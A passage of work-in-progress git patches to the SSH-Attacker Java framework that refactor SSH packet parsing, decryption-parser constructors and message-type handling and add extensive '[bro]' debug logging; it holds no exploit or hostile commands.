b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java @@ -17,9 +17,11 @@ import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; import de.rub.nds.sshattacker.core.exceptions.ConfigurationException; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipher; +import de.rub.nds.sshattacker.core.packet.cipher.PacketCipherFactory; import de.rub.nds.sshattacker.core.packet.cipher.keys.KeySet; import de.rub.nds.sshattacker.core.packet.compressor.PacketCompressor; import de.rub.nds.sshattacker.core.packet.crypto.AbstractPacketEncryptor; +import de.rub.nds.sshattacker.core.packet.crypto.PacketEncryptor; import de.rub.nds.sshattacker.core.packet.layer.AbstractPacketLayer; import de.rub.nds.sshattacker.core.packet.layer.PacketLayerFactory; import de.rub.nds.sshattacker.core.protocol.common.layer.MessageLayer; @@ -59,6 +61,15 @@ public PacketCompressor getCompressor() { } private AbstractPacketEncryptor encryptor; + + public void setEncryptor(AbstractPacketEncryptor encryptor) { + this.encryptor = encryptor; + } + + public void setCompressor(PacketCompressor compressor) { + this.compressor = compressor; + } + private PacketCompressor compressor; public PacketCipher getActiveDecryptCipher() { @@ -347,6 +358,12 @@ public void init() { readSequenceNumber = 0; handleAsClient = (getConnection().getLocalConnectionEndType() == ConnectionEndType.CLIENT); channelManager = new ChannelManager(this); + + encryptor = + new PacketEncryptor( + PacketCipherFactory.getNoneCipher(this, CipherMode.ENCRYPT), this); + + compressor = new PacketCompressor(); } // endregion diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index 28d983556..0a4f2677e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -33,6 +33,7 @@ import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; import de.rub.nds.sshattacker.core.protocol.authentication.message.AuthenticationMessage; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessagePreparator; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; import de.rub.nds.sshattacker.core.protocol.connection.message.ConnectionMessage; import de.rub.nds.sshattacker.core.protocol.transport.message.UnknownMessage; @@ -55,6 +56,11 @@ public SSH2Layer(SshContext context) { private void flushCollectedMessages( ProtocolMessageType runningProtocolMessageType, ByteArrayOutputStream byteStream) throws IOException { + + LOGGER.debug( + "[bro] Sending the following {} on {}", + byteStream.toByteArray(), + getLowerLayer().getLayerType()); if (byteStream.size() > 0) { getLowerLayer() .sendData( @@ -69,6 +75,14 @@ public LayerProcessingResult sendConfiguration() throws IOException { LayerConfiguration configuration = getLayerConfiguration(); ProtocolMessageType runningProtocolMessageType = null; ByteArrayOutputStream collectedMessageStream = new ByteArrayOutputStream(); + if (configuration != null) { + LOGGER.debug( + "[bro] Sending following configuration-size {} with layer_0 is {}", + configuration.getContainerList().size(), + configuration.getContainerList().get(0).toCompactString()); + } else { + LOGGER.debug("[bro] Configuration is null"); + } if (configuration != null && configuration.getContainerList() != null) { for (ProtocolMessage message : configuration.getContainerList()) { @@ -86,11 +100,34 @@ public LayerProcessingResult sendConfiguration() throws IOException { Serializer serializer = packet.getSerializer(context); byte[] serializedMessage = serializer.serialize();*/ - ProtocolMessageSerializer serializer = message.getSerializer(context); - byte[] serializedMessage = serializer.serialize(); - message.setCompleteResultingMessage(serializedMessage); + LOGGER.debug("[bro] here i am with sending the message"); + /* + LOGGER.debug( + "[bro] MESSAGE: {} {}", + message.getProtocolMessageType(), + message.getCompleteResultingMessage().getValue());*/ - getLowerLayer().sendData(null, serializedMessage); + /* + ProtocolMessagePreparator preparator = message.getPreparator(context); + preparator.prepare(); + + ProtocolMessageSerializer serializer = message.getSerializer(context); + LOGGER.debug("[bro] got serializer"); + byte[] serializedMessage = serializer.serialize(); + LOGGER.debug("[bro] serializied the message"); + message.setCompleteResultingMessage(serializedMessage); + LOGGER.debug("[bro] set complete message"); + ProtocolMessageType protocolMessageType = null; + protocolMessageType = message.getProtocolMessageType(); + + LOGGER.debug( + "[bro] Sending Data {} on lower layer {}", + serializedMessage, + getLowerLayer().getLayerType()); + + getLowerLayer() + .sendData(new PacketLayerHint(protocolMessageType), serializedMessage); + */ // Es gibt erstmal keine Handshake-Messages mit einer Spezialbehandlung bei SSH /*if (!message.isHandshakeMessage()) { @@ -102,6 +139,8 @@ public LayerProcessingResult sendConfiguration() throws IOException { addProducedContainer(message); } } + + LOGGER.debug("[bro] " + "flushing {} to lower layer", collectedMessageStream.toByteArray()); // hand remaining serialized to record layer flushCollectedMessages(runningProtocolMessageType, collectedMessageStream); return getLayerResult(); @@ -131,6 +170,10 @@ public LayerProcessingResult sendConfiguration() throws IOException { private void processMessage( ProtocolMessage message, ByteArrayOutputStream collectedMessageStream) throws IOException { + + ProtocolMessagePreparator preparator = message.getPreparator(context); + preparator.prepare(); + ProtocolMessageSerializer serializer = message.getSerializer(context); byte[] serializedMessage = serializer.serialize(); message.setCompleteResultingMessage(serializedMessage); @@ -289,9 +332,10 @@ public void readMessageForHint(PacketLayerHint hint) { readConnectionProtocolData(); break; case VERSION_EXCHANGE_MESSAGE: - readVerisonExchangeProtocolData(); + readVersionExchangeProtocolData(); + break; default: - LOGGER.error("Undefined record layer type"); + LOGGER.error("Undefined record layer type, found type {}", hint.getType()); break; } } @@ -301,7 +345,7 @@ private void readAuthenticationProtocolData() { readDataContainer(message, context); } - private void readVerisonExchangeProtocolData() { + private void readVersionExchangeProtocolData() { VersionExchangeMessage message = new VersionExchangeMessage(); readDataContainer(message, context); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java index dfacba9e1..973ffae9f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java @@ -37,7 +37,6 @@ import de.rub.nds.sshattacker.core.packet.parser.AbstractPacketParser; import de.rub.nds.sshattacker.core.packet.parser.BinaryPacketParser; import de.rub.nds.sshattacker.core.packet.parser.BlobPacketParser; -import de.rub.nds.sshattacker.core.protocol.connection.parser.*; import de.rub.nds.sshattacker.core.protocol.transport.message.AsciiMessage; import de.rub.nds.sshattacker.core.protocol.transport.parser.*; import java.io.ByteArrayInputStream; @@ -167,16 +166,23 @@ public LayerProcessingResult sendData( AbstractPacket packet; if (context.getPacketLayerType() == PacketLayerType.BLOB) { + LOGGER.debug("[bro] Created a BLOB Packet"); packet = new BlobPacket(); } else { + LOGGER.debug("[bro] Created a Binary Packet"); packet = new BinaryPacket(); } packet.setPayload(additionalData); + LOGGER.debug("[bro] Set Packetpayload"); Preparator preparator = packet.getPreparator(context); + LOGGER.debug("[bro] Got Preperator"); preparator.prepare(); + LOGGER.debug("[bro] Prepared Packetpayload"); Serializer serializer = packet.getSerializer(context); + LOGGER.debug("[bro] got Serializier"); byte[] serializedMessage = serializer.serialize(); + LOGGER.debug("[bro] Serializied Payload"); List packets = new LinkedList<>(); packets.add(packet); @@ -309,11 +315,13 @@ private static int resolveUnpaddedMessageLength(final byte[] totalHeaderLength) @Override public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException { + LOGGER.debug("[bro] receiveMoreDataForHint now in Transport"); LayerProcessingHint desiredHint = hint; InputStream dataStream = getLowerLayer().getDataStream(); AbstractPacketParser parser; AbstractPacket packet; + LOGGER.debug("[bro] Recieving a {}", context.getPacketLayer()); if (context.getPacketLayerType() == PacketLayerType.BINARY_PACKET) { parser = new BinaryPacketParser( @@ -328,6 +336,7 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException throw new RuntimeException(); } + LOGGER.debug("[bro] Parsing a {}", context.getPacketLayer()); parser.parse(packet); LOGGER.debug( @@ -385,7 +394,7 @@ public PacketLayerHint temp_parser(AbstractPacket packet, SshContext context) { LOGGER.warn( "The server reported the maximum number of concurrent unauthenticated connections has been exceeded."); } - return new PacketLayerHint(ProtocolMessageType.ASCII_MESSAEG); + return new PacketLayerHint(ProtocolMessageType.ASCII_MESSAGE); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/VersionExchangeMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/VersionExchangeMessage.java index 28c801582..e703249a3 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/VersionExchangeMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/VersionExchangeMessage.java @@ -17,9 +17,13 @@ import de.rub.nds.sshattacker.core.protocol.transport.preparator.VersionExchangeMessagePreparator; import de.rub.nds.sshattacker.core.protocol.transport.serializer.VersionExchangeMessageSerializer; import java.io.InputStream; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; public class VersionExchangeMessage extends ProtocolMessage { + private static final Logger LOGGER = LogManager.getLogger(); + private ModifiableString version; private ModifiableString comment; private ModifiableString endOfMessageSequence; @@ -95,6 +99,7 @@ public VersionExchangeMessagePreparator getPreparator(SshContext context) { @Override public VersionExchangeMessageSerializer getSerializer(SshContext context) { + LOGGER.debug("[bro] getting serializer"); return new VersionExchangeMessageSerializer(this); } From beab5a0559b9a7dba678eab4c53640edf2da7b06 Mon Sep 17 00:00:00 2001 From: Steffen Date: Sun, 11 Jun 2023 15:32:48 +0200 Subject: [PATCH 017/176] wip: Recieving and parsing kex is working --- .../sshattacker/core/layer/context/SshContext.java | 6 +----- .../packet/cipher/PacketChaCha20Poly1305Cipher.java | 2 +- .../sshattacker/core/packet/cipher/PacketCipher.java | 11 ++++++++--- .../core/packet/cipher/PacketGCMCipher.java | 2 +- .../core/packet/cipher/PacketMacedCipher.java | 5 ++--- .../core/packet/parser/BinaryPacketParser.java | 12 ++++++++++-- 6 files changed, 23 insertions(+), 15 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java index 2cadc8215..7caac1aaa 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java @@ -73,11 +73,7 @@ public void setCompressor(PacketCompressor compressor) { private PacketCompressor compressor; public PacketCipher getActiveDecryptCipher() { - return activeDecryptCipher; - } - - public void setActiveDecryptCipher(PacketCipher activeDecryptCipher) { - this.activeDecryptCipher = activeDecryptCipher; + return encryptor.getPacketMostRecentCipher(); } private PacketCipher activeDecryptCipher; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketChaCha20Poly1305Cipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketChaCha20Poly1305Cipher.java index 4da8ebde5..75a3682dd 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketChaCha20Poly1305Cipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketChaCha20Poly1305Cipher.java @@ -180,7 +180,7 @@ protected void decrypt(BinaryPacket packet) throws CryptoException { .collect(Collectors.toSet())); DecryptionParser parser = - new DecryptionParser(computations.getPlainPacketBytes().getValue(), 0); + new DecryptionParser(computations.getPlainPacketBytes().getValue() /*, 0*/); packet.setPaddingLength(parser.parseByteField(BinaryPacketConstants.PADDING_FIELD_LENGTH)); packet.setCompressedPayload( parser.parseByteArrayField( diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java index f45fba4a5..79b833441 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java @@ -10,11 +10,12 @@ import de.rub.nds.sshattacker.core.constants.*; import de.rub.nds.sshattacker.core.exceptions.CryptoException; import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.layer.data.Parser; import de.rub.nds.sshattacker.core.packet.BinaryPacket; import de.rub.nds.sshattacker.core.packet.BlobPacket; import de.rub.nds.sshattacker.core.packet.cipher.keys.KeySet; -import de.rub.nds.sshattacker.core.protocol.common.Parser; import de.rub.nds.tlsattacker.transport.ConnectionEndType; +import java.io.ByteArrayInputStream; public abstract class PacketCipher { @@ -146,12 +147,16 @@ protected boolean isPaddingValid(byte[] padding) { protected static class DecryptionParser extends Parser { - public DecryptionParser(byte[] array, int startPosition) { + /*public DecryptionParser(byte[] array, int startPosition) { super(array, startPosition); + }*/ + + public DecryptionParser(byte[] array) { + super(new ByteArrayInputStream(array)); } @Override - public Object parse() { + public void parse(Object t) { throw new UnsupportedOperationException(); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketGCMCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketGCMCipher.java index 42398613d..33db03a4f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketGCMCipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketGCMCipher.java @@ -163,7 +163,7 @@ public void decrypt(BinaryPacket packet) throws CryptoException { .collect(Collectors.toSet())); DecryptionParser parser = - new DecryptionParser(computations.getPlainPacketBytes().getValue(), 0); + new DecryptionParser(computations.getPlainPacketBytes().getValue() /*, 0*/); packet.setPaddingLength(parser.parseByteField(BinaryPacketConstants.PADDING_FIELD_LENGTH)); packet.setCompressedPayload( parser.parseByteArrayField( diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java index 4dbf9646d..55ac0cfe2 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java @@ -209,9 +209,8 @@ public void decrypt(BinaryPacket packet) throws CryptoException { decryptInner(packet); DecryptionParser parser = - new DecryptionParser( - computations.getPlainPacketBytes().getValue(), - isEncryptThenMac() ? 0 : BinaryPacketConstants.PACKET_FIELD_LENGTH); + new DecryptionParser(computations.getPlainPacketBytes().getValue() /*, + isEncryptThenMac() ? 0 : BinaryPacketConstants.PACKET_FIELD_LENGTH*/); packet.setPaddingLength(parser.parseByteField(BinaryPacketConstants.PADDING_FIELD_LENGTH)); packet.setCompressedPayload( parser.parseByteArrayField( diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java index a1ba8cd4a..6858b4bb6 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java @@ -67,6 +67,7 @@ public void parse(BinaryPacket binaryPacket) { LOGGER.debug("Packet structure: Encrypt-and-MAC"); parseEAMPacket(binaryPacket); } + LOGGER.debug("SET COMPLETE BYTES TO {}", getAlreadyParsed()); binaryPacket.setCompletePacketBytes(getAlreadyParsed()); LOGGER.trace( @@ -185,8 +186,14 @@ private void parseEAMPacket(BinaryPacket binaryPacket) throws CryptoException { } firstBlock = ArrayConverter.concatenate(firstBlock, decryptedBlock); decryptedByteCount += blockSize; + LOGGER.debug( + "LENGHT_FIELD_LENGHT = {} - DECRYPTED = {} - DECRYPTED_LENGHT = {}", + BinaryPacketConstants.LENGTH_FIELD_LENGTH, + firstBlock, + firstBlock.length); } while (decryptedByteCount < BinaryPacketConstants.LENGTH_FIELD_LENGTH); // setPointer(pointer); + LOGGER.debug("DONE WITH PARSING LENGHT"); computations.setPlainPacketBytes(firstBlock, true); binaryPacket.setLength( @@ -195,9 +202,10 @@ private void parseEAMPacket(BinaryPacket binaryPacket) throws CryptoException { firstBlock, 0, BinaryPacketConstants.LENGTH_FIELD_LENGTH))); binaryPacket.setCiphertext( parseByteArrayField( - BinaryPacketConstants.LENGTH_FIELD_LENGTH - + binaryPacket.getLength().getValue())); + /*BinaryPacketConstants.LENGTH_FIELD_LENGTH + + */ binaryPacket.getLength().getValue())); binaryPacket.setMac( parseByteArrayField(activeDecryptCipher.getMacAlgorithm().getOutputSize())); + LOGGER.debug("DONE WITH PARSING parseEAMPacket "); } } From 42870f49577291a7a7a143a2ecc0d82ecf819a7b Mon Sep 17 00:00:00 2001 From: Steffen Date: Fri, 16 Jun 2023 23:13:22 +0200 Subject: [PATCH 018/176] wip: Send VersionKeyExchange is working --- .../core/constants/MessageIdConstant.java | 4 +- .../sshattacker/core/layer/data/Parser.java | 7 ++- .../core/layer/impl/SSH2Layer.java | 9 ++++ .../core/layer/impl/TransportLayer.java | 52 +++++++++++++++++-- .../core/packet/cipher/PacketCipher.java | 17 ++++++ .../core/packet/cipher/PacketMacedCipher.java | 30 ++++++++--- .../packet/parser/BinaryPacketParser.java | 2 +- 7 files changed, 107 insertions(+), 14 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/MessageIdConstant.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/MessageIdConstant.java index 0a3ca458f..f83fb9c87 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/MessageIdConstant.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/MessageIdConstant.java @@ -18,8 +18,8 @@ public enum MessageIdConstant { * - https://www.iana.org/assignments/ssh-parameters/ssh-parameters.xhtml#ssh-parameters-1 */ // [ RFC 4253 ] - VERSION_EXCHANGE_MESSAGE((byte) 0), - ASCII_MESSAEG((byte) 20), + VERSION_EXCHANGE_MESSAGE((byte) 200), + ASCII_MESSAGE((byte) 201), SSH_MSG_DISCONNECT((byte) 1), SSH_MSG_IGNORE((byte) 2), SSH_MSG_UNIMPLEMENTED((byte) 3), diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Parser.java index 8645856aa..8bab2ef38 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Parser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Parser.java @@ -69,7 +69,12 @@ protected byte[] parseByteArrayField(int length) { throw new EndOfStreamException("Reached end of Stream"); } if (read != length) { - throw new EndOfStreamException("Reached end of stream after " + read + " bytes"); + throw new EndOfStreamException( + "Reached end of stream after " + + read + + " bytes, while trying to read " + + length + + " bytes!"); } else { outputStream.write(data); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index 0a4f2677e..9214b69aa 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -36,6 +36,7 @@ import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessagePreparator; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; import de.rub.nds.sshattacker.core.protocol.connection.message.ConnectionMessage; +import de.rub.nds.sshattacker.core.protocol.transport.message.KeyExchangeInitMessage; import de.rub.nds.sshattacker.core.protocol.transport.message.UnknownMessage; import de.rub.nds.sshattacker.core.protocol.transport.message.VersionExchangeMessage; import java.io.ByteArrayOutputStream; @@ -334,6 +335,9 @@ public void readMessageForHint(PacketLayerHint hint) { case VERSION_EXCHANGE_MESSAGE: readVersionExchangeProtocolData(); break; + case SSH_MSG_KEXINIT: + readKexInitProtocolData(); + break; default: LOGGER.error("Undefined record layer type, found type {}", hint.getType()); break; @@ -345,6 +349,11 @@ private void readAuthenticationProtocolData() { readDataContainer(message, context); } + private void readKexInitProtocolData() { + KeyExchangeInitMessage message = new KeyExchangeInitMessage(); + readDataContainer(message, context); + } + private void readVersionExchangeProtocolData() { VersionExchangeMessage message = new VersionExchangeMessage(); readDataContainer(message, context); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java index 973ffae9f..28b7dbebf 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java @@ -19,6 +19,8 @@ import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; import de.rub.nds.sshattacker.core.protocol.message.*;*/ +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.constants.PacketLayerType; import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; import de.rub.nds.sshattacker.core.layer.LayerConfiguration; @@ -43,6 +45,7 @@ import java.io.IOException; import java.io.InputStream; import java.nio.charset.StandardCharsets; +import java.util.Arrays; import java.util.LinkedList; import java.util.List; import org.apache.logging.log4j.LogManager; @@ -345,6 +348,12 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException context.getPacketLayer().getDecryptor().decrypt(packet); context.getPacketLayer().getDecompressor().decompress(packet); + LOGGER.debug( + "[bro] Decompressed Payload: {}", + ArrayConverter.bytesToHexString(packet.getPayload())); + + packet.setCleanProtocolMessageBytes(packet.getPayload()); + addProducedContainer(packet); PacketLayerHint currentHint; @@ -360,7 +369,12 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException } else { currentInputStream.setHint(currentHint); } - currentInputStream.extendStream(packet.getCleanProtocolMessageBytes().getValue()); + // currentInputStream.extendStream(packet.getCleanProtocolMessageBytes().getValue()); + currentInputStream.extendStream( + Arrays.copyOfRange( + packet.getCleanProtocolMessageBytes().getValue(), + 1, + packet.getCleanProtocolMessageBytes().getValue().length)); } else { if (nextInputStream == null) { // only set new input stream if necessary, extend current stream otherwise @@ -368,7 +382,12 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException } else { nextInputStream.setHint(currentHint); } - nextInputStream.extendStream(packet.getCleanProtocolMessageBytes().getValue()); + // nextInputStream.extendStream(packet.getCleanProtocolMessageBytes().getValue()); + nextInputStream.extendStream( + Arrays.copyOfRange( + packet.getCleanProtocolMessageBytes().getValue(), + 1, + packet.getCleanProtocolMessageBytes().getValue().length)); } } @@ -398,7 +417,32 @@ public PacketLayerHint temp_parser(AbstractPacket packet, SshContext context) { } } - LOGGER.debug("[bro] Identifier: " + raw[0]); + // LOGGER.debug("[bro] Identifier: {} and constant {}", + // packet.getCiphertext().getValue()[1]); + + MessageIdConstant id = + MessageIdConstant.fromId( + packet.getCleanProtocolMessageBytes().getValue()[0], context.getContext()); + LOGGER.debug( + "[bro] Identifier: {} and constant {}", + packet.getCleanProtocolMessageBytes().getValue()[0], + id); + + switch (MessageIdConstant.fromId( + packet.getCleanProtocolMessageBytes().getValue()[0], context.getContext())) { + case SSH_MSG_KEXINIT: + LOGGER.debug("[bro] returning SSH KEX INIT Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXINIT); + default: + LOGGER.debug( + "[bro] cannot identifie {} as {} - returningn null", + raw[1], + MessageIdConstant.fromId( + packet.getCleanProtocolMessageBytes().getValue()[0], + context.getContext())); + return null; + // return new KeyExchangeInitMessageParser(raw).parse(); + } /* try { if (packet instanceof BlobPacket) { @@ -531,6 +575,6 @@ public PacketLayerHint temp_parser(AbstractPacket packet, SshContext context) { return new UnknownMessageParser(raw).parse(); }*/ - return null; + // return null; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java index 79b833441..69caaffad 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java @@ -7,6 +7,7 @@ */ package de.rub.nds.sshattacker.core.packet.cipher; +import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.*; import de.rub.nds.sshattacker.core.exceptions.CryptoException; import de.rub.nds.sshattacker.core.layer.context.SshContext; @@ -16,9 +17,14 @@ import de.rub.nds.sshattacker.core.packet.cipher.keys.KeySet; import de.rub.nds.tlsattacker.transport.ConnectionEndType; import java.io.ByteArrayInputStream; +import java.util.Arrays; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; public abstract class PacketCipher { + private static final Logger LOGGER = LogManager.getLogger(); + /** The SSH context this packet cipher is used in. */ protected final SshContext context; /** The key set used by the cipher. */ @@ -155,6 +161,17 @@ public DecryptionParser(byte[] array) { super(new ByteArrayInputStream(array)); } + public DecryptionParser(byte[] array, int offset) { + super(new ByteArrayInputStream(Arrays.copyOfRange(array, offset, array.length - 1))); + + byte[] new_array = Arrays.copyOfRange(array, offset, array.length - 1); + LOGGER.debug( + "[bro] New Bytarray with lenght {} : {}", + new_array.length, + ArrayConverter.bytesToHexString(new_array)); + // super(new ByteArrayInputStream(Arrays.copyOfRange(array, offset, array.length-1))); + } + @Override public void parse(Object t) { throw new UnsupportedOperationException(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java index 55ac0cfe2..455baff13 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java @@ -208,10 +208,18 @@ public void decrypt(BinaryPacket packet) throws CryptoException { decryptInner(packet); + /* DecryptionParser parser = + new DecryptionParser( + computations.getPlainPacketBytes().getValue(), + isEncryptThenMac() ? 0 : BinaryPacketConstants.PACKET_FIELD_LENGTH);*/ + DecryptionParser parser = - new DecryptionParser(computations.getPlainPacketBytes().getValue() /*, - isEncryptThenMac() ? 0 : BinaryPacketConstants.PACKET_FIELD_LENGTH*/); + new DecryptionParser(computations.getPlainPacketBytes().getValue()); + + int lenghtToForget = parser.parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH); + LOGGER.debug("[bro] lenght to forget:" + lenghtToForget); packet.setPaddingLength(parser.parseByteField(BinaryPacketConstants.PADDING_FIELD_LENGTH)); + LOGGER.debug("[bro] Padding Lenght:" + packet.getPaddingLength().getValue().intValue()); packet.setCompressedPayload( parser.parseByteArrayField( packet.getLength().getValue() @@ -219,6 +227,11 @@ public void decrypt(BinaryPacket packet) throws CryptoException { - BinaryPacketConstants.PADDING_FIELD_LENGTH)); packet.setPadding(parser.parseByteArrayField(packet.getPaddingLength().getValue())); + LOGGER.debug( + "[bro] Compressed Payload:" + + ArrayConverter.bytesToHexString( + packet.getCompressedPayload().getValue())); + if (isEncryptThenMac()) { computations.setEncryptedPacketFields( Stream.of( @@ -289,10 +302,12 @@ private void decryptInner(AbstractPacket packet) throws CryptoException { remainingBlocksIv); } else { // Case 1b: Binary packet / First block decrypted / Cipher without IV - remainingBlocks = - cipher.decrypt( - Arrays.copyOfRange( - ciphertext, firstBlock.length, ciphertext.length)); + /* remainingBlocks = + cipher.decrypt( + Arrays.copyOfRange( + ciphertext, firstBlock.length, ciphertext.length));*/ + + remainingBlocks = cipher.decrypt(ciphertext); } plainData = ArrayConverter.concatenate(firstBlock, remainingBlocks); } else { @@ -309,6 +324,9 @@ private void decryptInner(AbstractPacket packet) throws CryptoException { } } computations.setPlainPacketBytes(plainData); + ModifiableByteArray plain_modifialbel = new ModifiableByteArray(); + plain_modifialbel.setOriginalValue(plainData); + packet.setCleanProtocolMessageBytes(plain_modifialbel); } else { if (encryptionAlgorithm.getIVSize() > 0) { // Case 3a: Blob packet / Cipher with IV diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java index 6858b4bb6..d2c943989 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java @@ -203,7 +203,7 @@ private void parseEAMPacket(BinaryPacket binaryPacket) throws CryptoException { binaryPacket.setCiphertext( parseByteArrayField( /*BinaryPacketConstants.LENGTH_FIELD_LENGTH - + */ binaryPacket.getLength().getValue())); + +*/ binaryPacket.getLength().getValue())); binaryPacket.setMac( parseByteArrayField(activeDecryptCipher.getMacAlgorithm().getOutputSize())); LOGGER.debug("DONE WITH PARSING parseEAMPacket "); From 2173c414a51f549cfb42d192642af190115cc6c3 Mon Sep 17 00:00:00 2001 From: Steffen Date: 